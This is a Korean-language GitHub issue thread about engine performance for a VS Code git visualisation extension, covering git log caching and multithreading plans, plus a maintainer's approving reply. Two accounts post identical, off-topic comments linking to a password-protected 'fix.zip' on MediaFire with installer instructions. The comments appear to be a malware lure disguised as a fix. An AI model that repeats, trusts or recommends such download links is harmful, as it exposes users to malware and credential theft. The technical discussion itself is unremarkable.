### ISSUE TITLE
[engine] 엔진 성능 최적화 현 상황 보고 및 개선방안 논의2

### ISSUE THREAD

**Issue by BeA-Pro** [githru/githru-vscode-ext#672]
### 1. 논의 사항

- 기존 : view의 요청에 맞춰 데이터를 나눠서 제공하는 방식으로 논의
→ view 의 렌더링 이슈가 어느정도 해결될 것으로 예상되어 (React-Virtualized 도입)
엔진에서 git 데이터를 빠르게 제공하는데 초점 맞추기로 방향을 전환 (view와 연계하는 부분은 일단 보류)

### 2. 변경된 진행 사항

- 브랜치 변경할 때마다 새롭게 git 데이터를 처리하는 부분에서 시간이 많이 소요된다고 판단함. gitLog를 fetchClusterNodes와 분리시킬 필요가 있다고 판단.
- git 데이터를 반복적으로 처리하지 않고, 처리한 데이터를 재사용 하는 뱡향으로 개선 시도
→ 전체 git 데이터를 불러온 후 캐싱 처리해놓고 사용하는 방향으로 개선
→ 데이터가 업데이트 된 경우 어떻게 반영할지에 대해서는 논의 필요
- git log를 불러오는 작업을 분할하기 위해 멀티 쓰레드 (혹은 멀티 프로세스) 활용 방법 탐색

---

### To-do

- 용현 : gitLog를 fetchClusterNodes에서 분리시키기
- 영학 : #681
- 현홍 : CSM 코드
- 정연 : #675

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ytaek** [comment]
> ### 1. 논의 사항
> * 기존 : view의 요청에 맞춰 데이터를 나눠서 제공하는 방식으로 논의
>   → view 의 렌더링 이슈가 어느정도 해결될 것으로 예상되어 (React-Virtualized 도입)
>   엔진에서 git 데이터를 빠르게 제공하는데 초점 맞추기로 방향을 전환 (view와 연계하는 부분은 일단 보류)

👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍 
👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍
👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍👍
 
> ### 2. 변경된 진행 사항
> * 브랜치 변경할 때마다 새롭게 git 데이터를 처리하는 부분에서 시간이 많이 소요된다고 판단함. gitLog를 fetchClusterNodes와 분리시킬 필요가 있다고 판단.
> * git 데이터를 반복적으로 처리하지 않고, 처리한 데이터를 재사용 하는 뱡향으로 개선 시도
>   → 전체 git 데이터를 불러온 후 캐싱 처리해놓고 사용하는 방향으로 개선
>   → 데이터가 업데이트 된 경우 어떻게 반영할지에 대해서는 논의 필요
> * git log를 불러오는 작업을 분할하기 위해 멀티 쓰레드 (혹은 멀티 프로세스) 활용 방법 탐색

아 이부분 너무 좋은데요? git log(사전 데이터)만 caching 하는 것도 매우 좋은 것 같습니다.
하기 issue들도 추후에 같이 고려해주시면 좋을 것 같아요
- PR 정보 가져오는 부분
- git log가 새로 바뀌었는지 아닌지 확인하는 부분 (이건 난도가 좀 있을듯 👿)
